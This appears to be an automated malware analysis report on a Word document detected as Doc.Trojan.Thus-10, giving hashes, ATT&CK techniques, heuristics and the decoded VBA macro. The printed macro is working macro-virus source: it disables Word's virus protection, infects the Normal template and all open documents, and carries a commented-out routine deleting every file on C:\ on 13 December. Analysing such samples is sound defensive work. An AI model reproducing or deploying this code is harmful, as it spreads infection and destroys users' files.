Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0ddc09140cf85fea…

MALICIOUS

Office (OLE)

Size: 38.5 KB
Created: 2001-05-01 13:33:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 850fb0b954311ac1eac41a9cb14d1db4
SHA-1: b7fd116520b9a80c7a233c856678c59fefc3a8b3
SHA-256: 0ddc09140cf85fea5591e5c89880d4542f025419ae112f41b13005ae46eaf67a
Risk Score: 180

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The sample contains a critical ClamAV detection for 'Doc.Trojan.Thus-10', indicating malicious intent. The presence of a 'Document_Open' macro suggests an attempt to automatically execute malicious code when the document is opened. The VBA script appears to manipulate the NormalTemplate and other open documents to ensure its own persistence and potentially to hide its presence.

Heuristics 3

  • ClamAV: Doc.Trojan.Thus-10 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Thus-10
  • VBA macros detected [medium] OLE_VBA_MACROS (1 related finding)
    Document contains VBA macro code
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2520 bytes
SHA-256: 2d3adb0b8d5e705123fd844c475fc2be772d36da95e4113e91e7444caf23bf0f
Detection: ClamAV: Doc.Trojan.Thus-10
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
'Thus_002'
    On Error Resume Next
    Application.Options.VirusProtection = False
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_002'" Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .DeleteLines 1, NormalTemplate.VBProject.VBComponents.Item(1) _
    .CodeModule.CountOfLines
    End If
    If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule _
    .InsertLines 1, ActiveDocument.VBProject.VBComponents.Item(1) _
    .CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents _
    .Item(1).CodeModule.CountOfLines)
    End If
    If NormalTemplate.Saved = False Then NormalTemplate.Save
    For k = 1 To Application.Documents.Count
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.Lines(2, 1) <> "'Thus_002'" Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.DeleteLines 1, Application.Documents.Item(k) _
    .VBProject.VBComponents.Item(1).CodeModule.CountOfLines
    End If
    If Application.Documents.Item(k).VBProject.VBComponents.Item(1).CodeModule.CountOfLines = 0 Then
    Application.Documents.Item(k).VBProject.VBComponents.Item(1) _
    .CodeModule.InsertLines 1, NormalTemplate.VBProject.VBComponents _
    .Item(1).CodeModule.Lines(1, NormalTemplate.VBProject _
    .VBComponents.Item(1).CodeModule.CountOfLines)
    End If
    Next k
    'If (Day(Now()) = 13) And (Month(Now()) = 12) Then
    'With Application.FileSearch
     '   .NewSearch
     '   .LookIn = "C:\"
     '   .SearchSubFolders = True
     '   .FileName = "*.*"
     '   .MatchTextExactly = False
     '   .FileType = msoFileTypeAllFiles
     '   If .Execute > 0 Then
     '   For i = 1 To .FoundFiles.Count
     '   Kill .FoundFiles(i)
     '   Next i
     '   End If
    'End With
    'End If
End Sub
Private Sub Document_Close()
    Document_Open
End Sub
Private Sub Document_New()
    Document_Open
End Sub